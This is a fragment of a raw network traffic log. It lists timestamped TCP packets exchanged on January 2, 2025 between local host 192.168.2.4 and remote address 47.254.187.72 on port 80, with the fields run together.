                                                                            Jan 2, 2025 20:34:52.392222881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392240047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392249107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392273903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392277002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392290115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392291069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392302036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392312050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392323017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392330885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392368078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392503023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392513990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392518997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392530918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392541885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392550945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392558098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392560959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392570972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392575026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392584085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392594099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392615080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392642021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392662048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392672062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392682076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392692089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392693043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392698050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392708063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392715931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392729044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392736912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392751932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392764091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392772913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392774105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392786980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392817974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392899990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392910957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392921925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392966986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392967939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392977953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392990112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392995119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392999887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393004894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393022060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393032074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393042088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393053055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393057108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393066883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393076897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393088102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393111944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393212080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393223047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393234015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393251896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393271923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393273115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393282890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393292904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393307924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393315077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393342972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393376112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393387079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393397093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393419981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393440008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393446922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393461943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393472910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393482924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393493891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.393502951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.393534899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.396321058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396373987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396394014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396399975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.396404982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396414995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396426916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396436930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396444082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.396451950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.396480083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.396493912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.398919106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.398931026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.398941994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.398952007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.398961067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.398971081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.398979902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.398983002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.399015903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.399050951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.401477098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401485920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401500940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401511908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401521921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401534081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401546001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.401576042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.401578903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401593924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.401622057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.401623964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.401664972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.406569004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406599045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406605005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406614065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406626940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406631947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406637907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406642914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406650066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406663895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406670094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406688929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.406712055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406723022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406729937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406742096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.406766891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406771898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.406892061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.408560991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408571005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408580065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408591032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408601046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408608913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.408611059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408622026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408632994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.408695936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.409595013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409609079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409625053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409635067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409646034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409651995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.409656048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409667969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409677029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.409677029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.409701109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.409714937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.478935003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.478955030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.478966951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.478977919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.478987932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.478998899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479010105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479018927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479029894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479062080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479063034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479072094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479085922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479094982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479136944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479147911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479156971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479161024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479175091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479186058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479191065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479196072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479207039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479217052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479219913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479229927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479240894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479259014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479283094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479293108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479309082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479327917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479337931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479347944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479348898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479367971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479368925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479378939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479387999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479393005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479404926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479413986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479415894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479428053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479433060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479439020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479449987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479464054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479473114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479490995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479511976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479552031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479562044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479578972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479593992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479603052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479613066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479615927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479640961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479641914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479660034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479686975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479712009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479722977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479733944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479743958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479753017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479765892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479782104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479783058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479794979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479804993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479805946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479815960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479860067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479860067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479871035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479882956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479887962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479907036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.479949951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479969025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479980946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.479993105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480022907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480026960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480043888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480055094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480063915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480066061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480078936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480089903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480091095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480120897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480125904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480140924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480159044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480169058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480179071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480190039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480201960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480211973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480212927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480251074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.480325937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.480364084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.483077049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483088017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483108044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483118057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483129025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483143091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.483185053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.483217001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483227968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483233929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.483285904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.485565901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485641003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.485647917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485658884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485670090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485681057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485687017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.485692978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485703945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485713959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.485718966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.485755920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.488368034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488379002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488389969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488395929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488406897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488416910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488428116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.488429070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.488459110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.488476038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.493385077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493396044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493412971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493422985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493433952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493443966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493459940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493464947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.493470907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493482113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493491888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493495941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.493505001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493520975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493531942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493535995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.493542910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.493565083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.493582964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.495261908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495270967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495280981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495294094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495309114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495321035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.495326042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495337009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495342016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.495349884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495354891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.495358944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.495409012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.496454000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.496464014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.496474028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.496484995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.496495962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.496495962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.496507883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.496510029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.496520042 CET804973047.254.187.72192.168.2.4
